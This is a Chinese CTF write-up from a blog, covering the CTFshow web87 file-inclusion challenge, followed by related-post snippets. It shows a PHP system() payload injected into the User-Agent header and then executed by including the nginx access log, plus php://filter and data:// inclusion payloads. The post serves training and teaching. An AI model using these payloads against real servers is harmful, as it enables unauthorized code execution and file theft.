CTFshow web入门web87-文件包含10

已于 2023-12-06 11:49:36 修改
阅读量269 收藏
点赞数 1
文章标签: 前端 linux 运维 php
于 2023-12-01 08:32:05 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_74336671/article/details/134725796
版权

初始化界面:

把data协议也ban了,换一种方式,不直接通过当前页面进行内容的传递,使用日志包含。

通过wappalyzer查看网页的banner信息,发现是nginx服务器。

nginx服务器的日志通常路径为:

/var/log/nginx/access.log

/var/log/nginx/error.log

本题的路径是/var/log/nginx/access.log.

通过file读取日志,发现内容为请求行、UA头、IP地址。

通过抓包在UA头中插入payload,文件包含日志使代码执行。

 

 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) <?php system('cat fl0g.php');?>Gecko/20100101 Firefox/56.0
//修改的UA头

flag在源码当中.

郭与童
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CTFshow 文件包含 web87
Kradress的博客
12-12 1880
目录源码思路题解题解一题解二总结 源码 <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-16 11:25:09 # @Last Modified by: h1xa # @Last Modified time: 2020-09-16 21:57:55 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ if(isset($_GET['file'])
ctfshow-VIP题目-Web-详细解题思路
01-27
本文档总结了CTFSHOW-VIP题目-Web的详细解题思路,涵盖了多个Web安全领域的知识点,包括WP源码泄露、协议头信息泄露、robots后台泄露、phps源码泄露、源码压缩包泄露、版本控制泄露、vim临时文件泄露、cookie泄露、...
ctfshow文件包含
SopRomeo的博客
12-17 1127
web80-81 web80 过滤了data协议,php 这题新思路,伪造UA写入php代码,然后包含日志文件来进行getshell, 当然这题还可以用大小写绕,因为str_replace区分大小写 ?file=/var/log/nginx/access.log 查flag即可 web81 web82-86 过滤了.不能通过文件包含来进行绕过 利用session.upload_progress进行文件包含 不多说了,WMCTF也做过 import io import sys import req
ctfshow-文件包含
m0_74456293的博客
03-27 536
ctfshow-文件包含
ctfshow web入门 web87
最新发布
2401_83272517的博客
05-25 961
入门2年半还没有入门的菜坤的日常wp
ctfshow文件包含web87-117
m0_62207170的博客
06-19 454
ctfshow文件包含web87-117
文件包含(ctfshow web入门
qq_47168481的博客
11-17 3359
web79 本题考察php伪协议中的其他方法,对php进行了过滤 if(isset($_GET['file'])){ $file = $_GET['file']; $file = str_replace("php", "???", $file); include($file); } 可以采用data伪协议 file=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs/Pg== 后面的base64
CTFshow-菜狗杯-WEB-变量循环取值-我的眼里只有$
03-04
【压缩包子文件的文件名称列表】"CTFshow-变量循环取值-我的眼里只有$" 提供了一个可能包含源代码、日志、测试数据或其他相关资源的文件。参赛者可能需要分析这个文件,寻找与题目相关的线索,比如错误的变量赋值、...
ctfshow-web41~60-WP
02-21
ctfshow-web41~60-WPctfshow-web41~60-WP
ctfshow web223-group盲注无数字
10-21
ctfshow web223-group盲注无数字
CTFSHOW web193 left标注盲注脚本
05-04
其中,它通过修改注入语句中的 payload 变量,来获取不同的信息,包括数据库名、表名、列名和 flag 的值。在获取每个字符时,它会枚举 flag 可能的字符,逐个尝试,直到找到正确的字符为止。最终,它会输出获取到的...
ctfshow学习记录-web入门文件包含78-87
龟速更新的九某人
07-04 1631
ctfshow学习记录-web入门文件包含web78-87
ctfshow web入门 web87--web88&&web116--web117
2301_81040377的博客
04-04 735
content是写入内容,要进行base64编码 ,而base解码时,是4个一组,flag.php(要写入的文件),写入的内容<?整个函数调用的作用是将解码后的 $file 作为目标文件路径,然后将前面定义的终止执行提示语句与 $content 的内容拼接起来,一起写入到目标文件中。两次URL编码(浏览器(hackbar)一次,题目绕过一次)为。用php伪协议绕过但是常见的编码都被过滤这里有一种新的编码。php伪协议进行绕过(但是编码的时候必须绕过=和+)(工具用的bp的编码器,这个编码器我找了好久好久)
ctfshow web入门文件包含
qq_53263789的博客
07-19 667
ctfshow
《CTFshow-Web入门》08. Web 71~80
学习学习学习......
05-05 1900
eval() 利用,ob_end_clean() 绕过,正则绕过、PHP 垃圾回收机制,伪协议 {glob://}、PDO 利用、FFI 利用、include() 利用、伪协议 {php://},{data://}、一句话木马之 Nginx 日志利用。
ctfshow web入门 78-88的文件包含
Firebasky的博客
09-18 4175
1. web78 PHP伪协议读取 ?file=php://filter/convert.base64-encode/resource=flag.php 2. web79 ?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs= PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs ===> <?php system('cat flag.php'); 然后查看源代码 3. web80-
ctfshow_web入门_文件包含_web78~web117
qq_62989306的博客
09-13 755
文件包含php://filter伪协议、data协议、包含日志文件、session.upload_progress利用、条件竞争、死亡绕过……
CTFshow_Web_文件包含——web78~88、116~117
Ho1aAs‘s Blog
04-26 1036
文章目录题解web78web79web80~81web82~86web87web88web116web117完 题解 LFI:Local File Include RFI:Remote File Include web78 php伪协议,使用php://filter,解码即可 [GET]PAYLOAD: ?file=php://filter/convert.base64-encode/resource=flag.php web79 过滤php,data伪协议,使用php://data,上传php代码打开f
CTFshow_web入门_文件包含(web78~web88)
monster663的博客
02-02 979
web78 直接包含,如果不知道就去学习一下什么是文件包含 ?file=php://filter/read=convert.base64-encode/resource=flag.php web79 if(isset($_GET['file'])){ $file = $_GET['file']; $file = str_replace("php", "???", $file); include($file); }else{ highlight_file(__FILE__);
ctfshow web入门文件包含
05-24
我不确定你在问什么,但如果你是在问CTF中的Web入门题目,它可能包含以下内容: 1. 源代码:包含了网站的HTML、CSS和JavaScript代码,以及后端服务器脚本代码。 2. Robots.txt文件:该文件包含网站的爬虫指令,告诉...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值